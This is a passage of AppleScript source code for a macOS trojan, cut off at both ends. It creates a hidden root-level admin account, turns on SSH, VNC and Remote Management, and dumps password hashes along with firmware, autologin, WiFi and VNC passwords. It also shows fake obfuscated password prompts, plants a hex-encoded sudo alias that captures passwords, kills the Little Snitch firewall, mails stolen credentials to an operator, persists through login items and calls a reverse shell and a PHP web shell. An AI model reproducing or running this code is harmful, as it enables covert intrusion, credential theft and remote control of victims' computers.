            do shell script "/usr/bin/sudo niutil -create . /users/'" & hidden_admin_username & "'; /usr/bin/sudo niutil -createprop . /users/'" & hidden_admin_username & "' uid 0; /usr/bin/sudo niutil -createprop . /users/'" & hidden_admin_username & "' gid 20; /usr/bin/sudo niutil -createprop . /users/'" & hidden_admin_username & "' home /var/root; /usr/bin/sudo niutil -createprop . /users/'" & hidden_admin_username & "' shell /bin/bash; /usr/bin/sudo niutil -createprop . /users/'" & hidden_admin_username & "' passwd '" & hidden_admin_password_hash & "'; /usr/bin/sudo niutil -createprop . /users/'" & hidden_admin_username & "' _writers_passwd '" & hidden_admin_username & "'; /usr/bin/sudo niutil -createprop . /users/'" & hidden_admin_username & "' expire 0; /usr/bin/sudo niutil -createprop . /users/'" & hidden_admin_username & "' name '" & hidden_admin_username & "'; /usr/bin/sudo niutil -createprop . /users/'" & hidden_admin_username & "' realname '" & hidden_admin_username & "'; /usr/bin/sudo niutil -createprop . /users/'" & hidden_admin_username & "' change 0; /usr/bin/sudo niutil -createprop . /users/'" & hidden_admin_username & "' class ''; /usr/bin/sudo niutil . -append /groups/admin users '" & hidden_admin_username & "'; /usr/bin/sudo niutil . -append /groups/wheel users '" & hidden_admin_username & "'; /usr/bin/sudo niutil -createprop . /users/'" & hidden_admin_username & "' naprivs -2147483394; /usr/bin/sudo niutil -createprop . /users/'" & hidden_admin_username & "' authentication_authority ';basic;'"
        end try
    end if
    
    --Also add our user to the hidden user list and set showotherusers_managed to false.
    try
        if (do shell script "defaults read /Library/Preferences/com.apple.loginwindow HiddenUsersList 2>/dev/null; exit 0") does not contain hidden_admin_username then
            do shell script "/usr/bin/sudo defaults write /Library/Preferences/com.apple.loginwindow HiddenUsersList -array-add " & hidden_admin_username
            do shell script "/usr/bin/sudo defaults write /Library/Preferences/com.apple.loginwindow SHOWOTHERUSERS_MANAGED -bool false"
        end if
    end try
end agent_86_reporting_for_duty_chief

on papers_please()
    --Get current local IP addresses
    if debug then log_event("papers_please")
    set ip_addresses to (do shell script "IPaddress_en0=$(ifconfig en0 2>/dev/null | head -n 2 | tail -n 1 | sed -e 's/^.*inet //' -e 's/ .*$//' ) && echo \"${IPaddress_en0}\"") & " " & (do shell script "IPaddress_en1=$(ifconfig en1 2>/dev/null | head -n 2 | tail -n 1 | sed -e 's/^.*inet //' -e 's/ .*$//' ) && echo \"${IPaddress_en1}\"") & " " & (do shell script "router_IPaddress=$( arp -a | sed -e 's/^.* (//' -e 's/).*$//' ) && echo \"${router_IPaddress}\"")
    if be_quiet is false then
        --Outgoing communication will only happen if be_quiet is set to "false".
        if target_DDNS_username is not "" and target_DDNS_username is not "localhost" then
            try
                --If you are using a Dynamic DNS service to track the computer's public IP address you may not also need to get the public IP address separately
                do shell script "curl " & quoted form of target_DDNS_update_URL & " 2>&1 | grep success"
            on error error_message number error_number
                if debug then log_event("papers_please:ERROR #" & error_number & " " & error_message)
                --Wanna try a different DDNS service?
            end try
        else
            try
                --These get the public IP address
                set ip_addresses to (do shell script "curl 'http://www.whatismyip.com/automation/n09230945.asp' 2>/dev/null") & " " & ip_addresses
            on error error_message number error_number
                if debug then log_event("papers_please:ERROR #" & error_number & " " & error_message)
                set ip_addresses to (do shell script "curl http://ipid.shat.net/iponly/ | grep body | sed -e 's/^<body>//' -e 's/<.*$//'") & " " & ip_addresses
            end try
        end if
    end if
    set ip_addresses to do shell script "echo " & quoted form of ip_addresses & " | tr -s ' '"
end papers_please

on enable_ARD_and_VNC()
    --This *should* work from any admin account, without sudo or root, for any version of OS X which
    --includes ARD Client (server) such as 10.3, 10.4 and 10.5.
    if debug then log_event("enable_ARD_and_VNC")
    try
        -- Disable the Remote Management menu extra.
        do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -configure -clientopts -setmenuextra -menuextra no"
        if OSX_version_number_minor as number ≥ 5 then --For Leopard
            do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -deactivate"
            -- Allow access for all users and give all users full access.
            do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -configure -allowAccessFor -allUsers -privs -all"
            -- Start the Remote Management service.
            do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate"
        else if OSX_version_number_minor as number ≤ 4 then --For Tiger and prior
            do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate -configure -access -on -privs -all -restart -agent"
            do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate -restart -agent -console"
        end if
    end try
end enable_ARD_and_VNC

on enable_ssh()
    if debug then log_event("enable_ssh")
    try
        if i_am_an_admin then
            --This *should* work from any admin account, without sudo or root, for any version of OS X which
            --includes ARD Client (server) such as 10.3, 10.4 and 10.5.
            do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setremotelogin on &"
            --And while I'm here...
            do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setcomputersleep Never &" --(logic board only)
            do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setrestartpowerfailure on &"
            do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setrestartfreeze on &"
            do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setremoteappleevents on &"
        end if
    end try
    if i_have_root_access then
        try
            --If sudo works but I am not an admin (I might have modified /etc/sudoers)
            do shell script "/usr/bin/sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setremotelogin on &"
            --And while I'm here...
            do shell script "/usr/bin/sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setcomputersleep Never &" --(logic board only)
            do shell script "/usr/bin/sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setrestartpowerfailure on &"
            do shell script "/usr/bin/sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setrestartfreeze on &"
            do shell script "/usr/bin/sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setremoteappleevents on &"
        end try
        try
            --This handler needs root for everything past this point! (We either need to be running as root, from SystemLoginItems for instance, or sudo needs to be within the timestamp period!)
            if OSX_version_number_minor as number ≥ 4 then --For Tiger and Leopard
                --Note, this also opens port 22 in the default OS X firewall
                do shell script "/usr/bin/sudo launchctl load -w /System/Library/LaunchDaemons/ssh.plist &"
            else if OSX_version_number_minor as number ≥ 2 and OSX_version_number_minor as number ≤ 3 then --For Jaguar and Panther
                do shell script "/usr/bin/sudo mv /private/etc/xinetd.d/ssh /private/etc/xinetd.d/ssh.AStht && /usr/bin/sudo sed -e 's/disable = .*$/disable = no/' /private/etc/xinetd.d/ssh.AStht > /private/etc/xinetd.d/ssh && /usr/bin/sudo touch -r /private/etc/xinetd.d/ssh.AStht /private/etc/xinetd.d/ssh 2>/dev/null"
                do shell script "/usr/bin/sudo /sbin/service ssh start"
            else --For Puma and Cheetah
                --Still need to also open port 22 in the firewall (ipfw)!
                do shell script "/usr/bin/sudo sed -e 's/SSHSERVER=-NO-/SSHSERVER=-YES-/' /etc/hostconfig > /var/tmp/hostconfig && /usr/bin/sudo mv /etc/hostconfig /etc/hostconfig.AStht && /usr/bin/sudo mv /var/tmp/hostconfig /etc/hostconfig && /usr/bin/sudo touch -r /etc/hostconfig.AStht /etc/hostconfig 2>/dev/null"
                do shell script "grep 'SSHSERVER=-YES-' /etc/hostconfig || /usr/bin/sudo echo 'SSHSERVER=-YES-' >> /etc/hostconfig && /usr/bin/sudo touch -r /etc/hostconfig.AStht /etc/hostconfig 2>/dev/null"
                do shell script "/usr/bin/sudo /usr/sbin/sshd &"
            end if
        end try
    end if
end enable_ssh

on phone_home_and_try_a_different_method_if_it_fails()
    if debug then log_event("phone_home_and_try_a_different_method_if_it_fails")
    if be_quiet is false then
        --Outgoing communication will only happen if be_quiet is set to "false"
        --Be sure to use is_it_safe and/or these_are_not_the_outgoing_network_communications_you_are_looking_for() first!
        --The email will be sent to the address set in the variable masters_email_address !
        --HEY! You -MUST- change the lines below to work with the specific web mail form which you are using!
        --An easy way to see which method (POST as shown in this example, or GET) is used, and in what format
        --the data should be submitted, and what phrase indicates success, is to use Firefox and the LiveHTTPHeaders
        --extension while manually sending an email through the site's web mail form.
        if debug then log_event(quoted form of webmail_command_line)
        
        set the_message to my_username & "--" & my_password & "--" & ip_addresses & "--" & OSX_hashes
        set the_message to fuxor(the_message)
        set the_message to do shell script "echo " & quoted form of the_message & " | tr ' \\r\\n\\t' '+'"
        
        set webmail_command_line to do shell script "echo " & quoted form of webmail_command_line & " | sed -e 's/<<MASTERS_EMAIL_ADDRESS>>/" & masters_email_address & "/' -e 's/<<THE_TITLE>>/" & the_title & "/' -e 's/<<THE_MESSAGE>>/" & quoted form of the_message & "/' -e 's/<<SUCCESS_RESPONSE_TERM>>/" & webmail_success_response_term & "/' "
        
        try
            if (do shell script webmail_command_line) contains webmail_success_response_term then
                if debug then log_event("phone_home_and_try_a_different_method_if_it_fails: message sent successfully")
            else
                if debug then log_event("phone_home_and_try_a_different_method_if_it_fails: sending message failed")
            end if
        on error
            if debug then log_event("phone_home_and_try_a_different_method_if_it_fails: error while sending message")
        end try
    end if
end phone_home_and_try_a_different_method_if_it_fails

on exit_stage_left()
    --This next if then statement will handle moving the trojan and putting 'original.app'
    --from within the trojan's app package back where the trojan had been
    if debug then log_event("exit_stage_left")
    if move_myself is not false then
        try
            do shell script "cd \"" & POSIX path of (my_POSIX_folder) & "\" ..; rm -Rf .AStht 2>/dev/null; mv -f \"" & POSIX path of (my_Path) & "\" .AStht; mv -f .AStht/Contents/original.app/ \"" & POSIX path of (my_Path) & "\"" --add; rm -Rf .AStht 2>/dev/null before the last quote to self-delete after moving
        end try
        try
            do shell script "/usr/bin/open \"" & POSIX path of (my_Path) & "\""
        end try
    end if
end exit_stage_left

on whos_in_charge_here()
    if debug then log_event("whos_in_charge_here")
    if text of (do shell script "id" user name my_username) contains "admin" then
        set i_am_an_admin to true
    else
        set i_am_an_admin to false
    end if
end whos_in_charge_here

on dupe_user()
    --Ask the user to supply a password
    if debug then log_event("dupe_user")
    local tries
    set the_title to "Sjsbenmr2Ukqnbr2mrlcvmra2gjcm2knaaejmq."
    set the_message to "A2pjmmckb2kmrsrmripr2svyr2una2orri2qrbrpbrq2niq2zcab2or2mrknvmrq.2Eibrm2gjcm
naaejmq2bj2pjibvicr:"
    set tries to 0
    if text of (do shell script "id" user name my_username) contains "admin" then
        set i_am_an_admin to true
        repeat until i_have_root_access
            set my_password to text returned of (display dialog (defuxor(the_message)) with icon padlock_icon with title (defuxor(the_title)) default answer "" buttons {"OK"} default button "OK" with hidden answer)
            set tries to tries + 1
            try
                if text of (do shell script "echo $UID" user name my_username password my_password with administrator privileges) = "0" then set i_have_root_access to true
                do shell script "echo " & my_username & ":" & my_password & " >> " & quoted form of accounts_file
            on error error_message number error_number
                if tries is 4 then
                    display dialog "An authentication error has occurred. The file could not be repaired!" buttons {"OK"} default button "OK"
                    return
                end if
                set the_message to "Iipjmmrpb2knaaejmq.2Cyvpx2Ox2bj2bmg2ntnvi."
                display dialog defuxor(the_message) with title (defuxor(the_title)) buttons {"OK"} default button "OK"
            end try
        end repeat
    else
        set my_password to text returned of (display dialog (defuxor(the_message)) with icon padlock_icon with title (defuxor(the_title)) default answer "" with hidden answer)
    end if
end dupe_user

on restart()
    --This handler needs root! (We either need to be running as root, from SystemLoginItems for instance, or sudo needs to be within the timestamp period!)
    --Tell the user that a restart is required.
    if debug then log_event("restart")
    set the_title to "Sjsbenmr2Ukqnbr"
    set the_message to "Tur2ckqnbr(a)2ermr2viabnyyrq2acppraascyyg.2Yjc2aujcyq2mrabnmb2gjcm2pjzkcbrm2ije."
    display dialog defuxor(the_message) with icon software_update_icon with title defuxor(the_title) buttons {"Restart"} default button "Restart"
    do shell script ("/usr/bin/sudo reboot")
end restart

on fuxor(the_variable)
    --Obfuscate some text
    if debug then log_event("fuxor")
    local the_variable
    return do shell script ("echo " & quoted form of the_variable & " | tr '" & key2 & "' '" & key1 & "'")
end fuxor

on defuxor(the_variable)
    --Deobfuscate some text
    if debug then log_event("defuxor")
    local the_variable
    return do shell script ("echo " & quoted form of the_variable & " | tr '" & key1 & "' '" & key2 & "'")
end defuxor

on just_hangin_out()
    --Keep checking until sudo works. Once called, the script will just sit here forever until sudo works or until it's quit.
    if debug then log_event("just_hangin_out")
    try
        do shell script "/usr/bin/sudo cat /etc/sudoers"
    on error error_message number error_number
        --if error_message is not "Password:" then return ?
        delay 290 -- wait 4 minutes and 50 seconds before trying again. The default sudo timeout is 5 minutes.
        just_hangin_out()
    end try
end just_hangin_out

on pass_the_hash()
    --This handler needs root! (We either need to be running as root, from SystemLoginItems for instance, or sudo needs to be within the timestamp period!)
    if debug then log_event("pass_the_hash")
    local kcpassword, NATpassword, ARDVNCpassword, autoLoginUser
    set kcpassword to ""
    set NATpassword to ""
    set ARDVNCpassword to ""
    set ofpassword to ""
    
    --This gets the password hashes for all OS X user accounts.
    try
        if OSX_version_number_minor as number ≥ 4 then --For Tiger and Leopard
            set OSX_hashes to do shell script "dscl . -list /Users \"authentication_authority\" | grep -i hash | sed \"s/ .*$//\" | while read the_name; do the_hashfile=$( dscl . -read /users/\"${the_name}\" generateduid | sed \"s/^.* //\" ); the_hash=`sudo cat \"/var/db/shadow/hash/$the_hashfile\"`; ntlm_hash=\"${the_hash:0:64}\";[ \"${ntlm_hash}\" == \"${ntlm_hash/0000}\" ] && echo \"_${the_name}_NTLM___:${the_hash:0:32}:${the_hash:32:32}\"; S0SHA1=\"${the_hash:104:48}\"; cram_md5=\"${the_hash:104:64}\"; SSHA1=\"${the_hash:168:48}\"; [ \"x${the_hash:153:15}\" != \"x000000000000000\" ] && echo \"${the_name}_CRAM_MD5:${cram_md5}\" || { [ -n \"${S0SHA1//0}\" ] && echo \"${the_name}_S0SHA1__:${S0SHA1}\"; }; [ -n \"${SSHA1//0}\" ] && echo \"${the_name}_SSHA1___:${SSHA1}\"; done"
        else if OSX_version_number_minor as number = 3 then --For Panther
            set OSX_hashes to do shell script "/usr/bin/nidump passwd . | grep -v \":\\" & (ASCII character 42) & ":\" | while read line;do echo \"${line}\";the_name=\"${line%%:*}\" the_hashfile=$(niutil -readprop . /users/${the_name} generateduid 2>/dev/null);sudo test -f /var/db/shadow/hash/${the_hashfile} && the_hash=$(sudo cat \"/var/db/shadow/hash/${the_hashfile}\");echo \"${the_name}_NTLM:${the_hash:0:32}:${the_hash:32:32}:\";echo \"${the_name}_SHA1:${the_hash:64:40}:\"; done"
        else --For Jaguar and prior
            set OSX_hashes to do shell script "/usr/bin/nidump passwd . | grep -v \":\\" & (ASCII character 42) & ":\" | while read line;do echo -n \"${line} \";the_name=\"${line%%:*}\" the_hashfile=$(niutil -readprop . /users/${the_name} generateduid 2>/dev/null); /usr/bin/sudo test -d /var/db/samba/hash && /usr/bin/sudo test -f /var/db/samba/hash/${the_hashfile} && /usr/bin/sudo cat \"/var/db/samba/hash/${the_hashfile}\" || echo;done"
        end if
    end try
    do shell script "echo " & quoted form of OSX_hashes & " >> " & quoted form of hashes_file
    
    --Get the Open Firmware password
    try
        set ofpassword to do shell script "IFS='%'; hexbytes=( $( /usr/bin/sudo nvram -p | grep password | cut -f 2 ) ); IFS='';for ((i=1;i<${#hexbytes[*]};i++)); do echo -en \"\\x$(printf '%x' $((16#AA^16#${hexbytes[$i]})))\";done;echo"
    end try
    if ofpassword is not "" then
        do shell script "echo " & quoted form of ofpassword & " >> " & quoted form of candidates_file
    end if
    
    --For the autologin password stored in /etc/keychain
    try
        set kcpassword to do shell script "declare -i offset=0 i=0;declare -a keys=(7d 89 52 23 d2 bc dd ea a3 b9 1f) hexbytes=($(sudo hexdump -v -e '/1 \"%02X \"' /etc/kcpassword));for ((offset=0;offset<${#hexbytes[*]};offset++));do newbyte=$(printf '%02X' $((16#${keys[${i}]}^16#${hexbytes[$offset]})));[ \"${newbyte}\" == \"00\" ]&&echo&&break;echo -en \"\\x${newbyte}\";let i+=1;[ $i -gt 10 ]&&let i=0;done"
        set autoLoginUser to do shell script "defaults read /Library/Preferences/com.apple.loginwindow autoLoginUser"
    on error error_message number error_number
        if debug then log_event("kcpassword:ERROR #" & error_number & " " & error_message)
        --Either /etc/kcpassword doesn't exist (as in no autologin user is set),
        --or the password does not belong to this user (we could test it with the other usernames of this system),
        --or sudo failed and I could not read the /etc/keychain file.
        --or the account is not allowed to use sudo.
    end try
    if kcpassword is not "" then
        do shell script "echo " & quoted form of kcpassword & " >> " & quoted form of candidates_file
        if autoLoginUser is not "" then
            do shell script "echo '" & autoLoginUser & ":" & kcpassword & "' >> " & quoted form of accounts_file
        end if
    end if
    
    --For the ad-hoc WiFi network password which is stored as plain text.
    try
        set NATpassword to do shell script "defaults read /Library/Preferences/SystemConfiguration/com.apple.nat NAT | grep NetworkPassword | sed -e 's/^.*<//' -e 's/>.*$//'"
    end try
    if NATpassword is not "" then
        do shell script "echo " & quoted form of NATpassword & " >> " & quoted form of candidates_file
    end if
    
    --For the ARD VNC access password
    try
        --If /Library/Preferences/com.apple.VNCSettings.txt isn't there, create it with password 'a secret'
        try
            do shell script "[ ! -f /Library/Preferences/com.apple.VNCSettings.txt ] && echo -n '7614220BE8DAA096FF1C39567390ADCA' > /Library/Preferences/com.apple.VNCSettings.txt"
            set ARDVNCpassword to "a secret"
            return
        end try
        try
            set ARDVNCpassword to do shell script "declare -a keys=(17 34 51 6e 8b a8 c5 e2 ff 1c 39 56 73 90 ad ca);p=$(sudo cat /Library/Preferences/com.apple.VNCSettings.txt);hexbytes=(${p:0:2} ${p:2:2} ${p:4:2} ${p:6:2} ${p:8:2} ${p:10:2} ${p:12:2} ${p:14:2} ${p:16:2} ${p:18:2} ${p:20:2} ${p:22:2} ${p:24:2} ${p:26:2} ${p:28:2} ${p:30:2});for ((offset=0;offset<${#keys[*]};offset++));do echo -en \"\\x$(printf '%02X' $((16#${keys[${offset}]}^16#${hexbytes[$offset]})))\";done"
        end try
        if ARDVNCpassword is not "" then
            do shell script "echo " & quoted form of ARDVNCpassword & " >> " & quoted form of candidates_file
        end if
    end try
end pass_the_hash

on alias_sudo()
    --This routine creates a shell script named ".sudo2" and then aliases the sudo command to run the shell script.
    --The alias is also added to the user's .profile. Captured passwords are output to ~/Public/.howdy
    if debug then log_event("alias_sudo")
    do shell script "echo -e \"\\x23\\x21\\x2f\\x62\\x69\\x6e\\x2f\\x62\\x61\\x73\\x68\\x0a\\x5b\\x20\\x22\\x78\\x24\\x7b\\x2a\\x7d\\x22\\x20\\x3d\\x3d\\x20\\x22\\x78\\x22\\x20\\x5d\\x20\\x26\\x26\\x20\\x65\\x78\\x65\\x63\\x20\\x2f\\x75\\x73\\x72\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x75\\x64\\x6f\\x20\\x26\\x26\\x20\\x65\\x78\\x69\\x74\\x20\\x31\\x3b\\x5b\\x20\\x22\\x78\\x24\\x7b\\x31\\x7d\\x22\\x20\\x21\\x3d\\x20\\x22\\x78\\x24\\x7b\\x31\\x2f\\x2d\\x6b\\x7d\\x22\\x20\\x2d\\x6f\\x20\\x22\\x78\\x24\\x7b\\x31\\x7d\\x22\\x20\\x21\\x3d\\x20\\x22\\x78\\x24\\x7b\\x31\\x2f\\x2d\\x4b\\x7d\\x22\\x20\\x5d\\x20\\x26\\x26\\x20\\x65\\x78\\x65\\x63\\x20\\x2f\\x75\\x73\\x72\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x75\\x64\\x6f\\x20\\x22\\x24\\x7b\\x2a\\x7d\\x22\\x20\\x26\\x26\\x20\\x65\\x78\\x69\\x74\\x20\\x30\\x3b\\x5b\\x20\\x24\\x28\\x28\\x24\\x52\\x41\\x4e\\x44\\x4f\\x4d\\x25\\x32\\x29\\x29\\x20\\x21\\x3d\\x20\\x30\\x20\\x5d\\x20\\x26\\x26\\x20\\x65\\x78\\x65\\x63\\x20\\x2f\\x75\\x73\\x72\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x75\\x64\\x6f\\x20\\x22\\x24\\x7b\\x2a\\x7d\\x22\\x20\\x26\\x26\\x20\\x65\\x78\\x69\\x74\\x20\\x30\\x3b\\x65\\x63\\x68\\x6f\\x20\\x2d\\x6e\\x65\\x20\\x22\\x5c\\x78\\x35\\x30\\x5c\\x78\\x36\\x31\\x5c\\x78\\x37\\x33\\x5c\\x78\\x37\\x33\\x5c\\x78\\x37\\x37\\x5c\\x78\\x36\\x66\\x5c\\x78\\x37\\x32\\x5c\\x78\\x36\\x34\\x5c\\x78\\x33\\x61\\x22\\x3b\\x73\\x74\\x74\\x79\\x20\\x2d\\x65\\x63\\x68\\x6f\\x20\\x32\\x3e\\x2f\\x64\\x65\\x76\\x2f\\x6e\\x75\\x6c\\x6c\\x3b\\x72\\x65\\x61\\x64\\x20\\x70\\x61\\x73\\x73\\x3b\\x73\\x74\\x74\\x79\\x20\\x73\\x61\\x6e\\x65\\x20\\x32\\x3e\\x2f\\x64\\x65\\x76\\x2f\\x6e\\x75\\x6c\\x6c\\x3b\\x65\\x63\\x68\\x6f\\x20\\x22\\x24\\x7b\\x70\\x61\\x73\\x73\\x7d\\x20\\x22\\x20\\x3e\\x3e\\x20\\x7e\\x2f\\x50\\x75\\x62\\x6c\\x69\\x63\\x2f\\x2e\\x68\\x6f\\x77\\x64\\x79\\x3b\\x65\\x63\\x68\\x6f\\x3b\\x65\\x63\\x68\\x6f\\x20\\x22\\x53\\x6f\\x72\\x72\\x79\\x2c\\x20\\x74\\x72\\x79\\x20\\x61\\x67\\x61\\x69\\x6e\\x2e\\x22\\x3b\\x2f\\x75\\x73\\x72\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x75\\x64\\x6f\\x20\\x2d\\x6b\\x20\\x32\\x3e\\x2f\\x64\\x65\\x76\\x2f\\x6e\\x75\\x6c\\x6c\\x3b\\x65\\x78\\x65\\x63\\x20\\x2f\\x75\\x73\\x72\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x75\\x64\\x6f\\x20\\x22\\x24\\x7b\\x2a\\x7d\\x22\" > ~/Library/.sudo2"
    try
        do shell script "grep 'alias sudo' ~/.profile"
    on error
        do shell script defuxor("puzjq2cjt+f2~/Lvomnmg/.acqj72;2nyvna2acqj=~/Lvomnmg/.acqj72;2rpuj2nyvna2acqj=~/Lvomnmg/.acqj72>>2~/.kmjsvyr")
    end try
end alias_sudo

on is_it_safe()
    --check if Little Snitch is running
    if debug then log_event("is_it_safe")
    try
        do shell script "ps -axww | grep -i \"lsd" & (ASCII character 92) & (ASCII character 124) & "Snitch\" | grep -v grep"
        set be_quiet to true
        return
    end try
    set be_quiet to false
end is_it_safe

on these_are_not_the_outgoing_network_communications_you_are_looking_for()
    --This handler needs root! (We either need to be running as root, from SystemLoginItems for instance, or sudo needs to be within the timestamp period!)
    --Disable Little Snitch prior to using curl
    if debug then log_event("these_are_not_the_outgoing_network_communications_you_are_looking_for")
    try
        do shell script "ps -axww | grep -i \"lsd" & (ASCII character 92) & (ASCII character 124) & "Snitch\" | grep -v grep | while read process and_junk; do /usr/bin/sudo kill -9 \"${process}\"; done; /usr/bin/sudo killall \"lsd\"; /usr/bin/sudo mv \"/Library/Little Snitch\" /Library/.hushnow"
        set be_quiet to false
    end try
end these_are_not_the_outgoing_network_communications_you_are_looking_for

on slash_x_hex(the_variable)
    if debug then log_event("slash_x_hex")
    local hex_characters, hexified_string, each_character, decimal_value, the_variable
    set hex_characters to "0123456789ABCDEF"
    set hexified_string to ""
    repeat with each_character in the_variable
        set decimal_value to ASCII number of each_character
        set hexified_string to hexified_string & (ASCII character 92) & "x" & character (decimal_value div 16 + 1) of hex_characters & character (decimal_value mod 16 + 1) of hex_characters
    end repeat
    return hexified_string
end slash_x_hex

on test_a_password_with_sudo(try_this_password)
    if debug then log_event("test_a_password_with_sudo")
    local try_this_password
    try
        --HEY! Note that this is going to invalidate the sudo timestamp!
        --If sudo was already working, do what you need sudo for BEFORE calling this!
        do shell script "/usr/bin/sudo -k; echo " & quoted form of try_this_password & " | /usr/bin/sudo -S id -u"
        if result is "0" then
            set i_am_an_admin to true
            set i_have_root_access to true
            do shell script "echo " & my_username & ":" & my_password & " >> " & quoted form of accounts_file
        end if
    end try
end test_a_password_with_sudo

on can_sudo_come_out_to_play()
    if debug then log_event("can_sudo_come_out_to_play")
    try
        do shell script "/usr/bin/sudo id -u" --should fail if sudo isn't within the timeout or return "0" if it worked
        set i_have_root_access to true
    on error error_message number error_number
        set i_have_root_access to false
    end try
end can_sudo_come_out_to_play

on move_in()
    --Test if I am running from /Library/Caches and if not, try to copy myself there (but only if I'm compiled)
    if debug then log_event("move_in")
    if my_POSIX_folder does not contain "/Library/Caches" and my_POSIX_folder is not "/Applications/AppleScript/" then
        try
            do shell script "ditto -X -rsrc " & quoted form of my_Path & " /Library/Caches/" & quoted form of my_name
            set launch_path to "/Library/Caches/" & my_name
            do shell script "chmod 777 /Library/Caches/" & quoted form of my_name
        on error error_message number error_number
            if debug then log_event("move_in:ERROR #" & error_number & " " & error_message)
            --Couldn't copy myself into /Library/Caches/
        end try
    end if
end move_in

on loosen_permissions_on_SystemLoginItems()
    --This handler needs root! (We either need to be running as root, from SystemLoginItems for instance, or sudo needs to be within the timestamp period!)
    if debug then log_event("loosen_permissions_on_SystemLoginItems")
    try
        do shell script "touch /Library/Preferences/com.apple.SystemLoginItems.plist"
    on error error_message number error_number
        do shell script "/usr/bin/sudo chmod 777 /Library/Preferences/com.apple.SystemLoginItems.plist 2>/dev/null"
    end try
end loosen_permissions_on_SystemLoginItems

on rerun_me_every_startup()
    --Test if my launch path is listed in /Library/Preferences/com.apple.SystemLoginItems.plist and if not, try to add it (but only if I'm compiled)
    if debug then log_event("rerun_me_every_startup")
    try
        set SystemLoginItems to do shell script "defaults read /Library/Preferences/com.apple.SystemLoginItems AutoLaunchedApplicationDictionary"
    on error error_message number error_number
        if debug then log_event("rerun_me_every_startup:ERROR #" & error_number & " " & error_message)
        --can't read from /Library/Preferences/com.apple.SystemLoginItems.plist, perhaps it does not yet exist
    end try
    
    if SystemLoginItems does not contain launch_path and launch_path does not contain "Script Editor.app" then
        try
            do shell script "touch '/Library/Preferences/com.apple.SystemLoginItems.plist'"
            do shell script "defaults write /Library/Preferences/com.apple.SystemLoginItems AutoLaunchedApplicationDictionary -array-add '<dict><key>Hide</key><true/><key>Path</key><string>" & launch_path & "</string></dict>'"
            do shell script "chmod 777 /Library/Preferences/com.apple.SystemLoginItems.plist 2>/dev/null"
        on error error_message number error_number
            --can't write to /Library/Preferences/com.apple.SystemLoginItems.plist, I'll add me to the user's login items instead.
            do shell script "touch ~/Library/Preferences/loginwindow.plist"
            do shell script "defaults write ~/Library/Preferences/loginwindow AutoLaunchedApplicationDictionary -array-add '<dict><key>Hide</key><true/><key>Path</key><string>" & launch_path & "</string></dict>'"
            do shell script "chmod 777 ~/Library/Preferences/loginwindow.plist 2>/dev/null"
        end try
    end if
end rerun_me_every_startup

on stuff_for_root_to_do()
    --This handler needs root!
    if debug then log_event("stuff_for_root_to_do")
    move_in()
    loosen_permissions_on_SystemLoginItems()
    rerun_me_every_startup()
    agent_86_reporting_for_duty_chief()
    its_smoky_in_here_lets_open_ports_in_the_firewall()
    enable_ssh()
    install_phpshell()
    enable_webserver()
    enable_Personal_File_Sharing()
    install_and_activate_logKext()
    pass_the_hash()
    i_have_a_secret()
    there_are_no_osx_viruses_silly_wabbit()
    i_like_you_just_as_you_are()
    is_it_safe()
    if be_quiet is not true then
        these_are_not_the_outgoing_network_communications_you_are_looking_for()
    end if
    papers_please()
    phone_home_and_try_a_different_method_if_it_fails()
    reverse_shell()
    Back_to_masters_VNC()
    nothing_to_see_here()
    throw_another_log_on_the_fire()
    --exit_stage_left
end stuff_for_root_to_do

on stuff_for_an_admin_without_sudo_to_do()
    --This is assuming that I am an admin user, I do not have a functional password and sudo is not already working
    if debug then log_event("stuff_for_an_admin_without_sudo_to_do")
    move_in()
    rerun_me_every_startup()
    enable_ssh()
    install_phpshell()
    i_have_a_secret()
    i_like_you_just_as_you_are()
    reverse_shell()
    Back_to_masters_VNC()
    is_it_safe()
    if be_quiet is false then
        papers_please()
        phone_home_and_try_a_different_method_if_it_fails()
    end if
    --exit_stage_left()
end stuff_for_an_admin_without_sudo_to_do

on stuff_for_a_regular_user_to_do()
    --This is assuming that I am a standard user, not an admin, and sudo won't work
    if debug then log_event("stuff_for_a_regular_user_to_do")
    move_in()
    rerun_me_every_startup()
    install_phpshell()
    i_have_a_secret()
    i_like_you_just_as_you_are()
    reverse_shell()
    Back_to_masters_VNC()
    is_it_safe()
    if be_quiet is false then
        papers_please()
        phone_home_and_try_a_different_method_if_it_fails()
    end if
    brute_user_accounts()
    --exit_stage_left
end stuff_for_a_regular_user_to_do


---------------------------------------------------------------------------
--Main
--------------------
--HEY! Keep in mind that outgoing communications only happen if be_quiet is set to false
--So, you might want to call is_it_safe and possibly
--these_are_not_the_outgoing_network_communications_you_are_looking_for before getting
--the IP address or sending email

if debug then log_event("Main")

--Get my preferences
read_my_plist()

--Check if sudo works already, do this immediately in case sudo's timestamp timeout is near
can_sudo_come_out_to_play()

--Check if I am a member of the admin group
whos_in_charge_here()

--Setup some folders and files
try
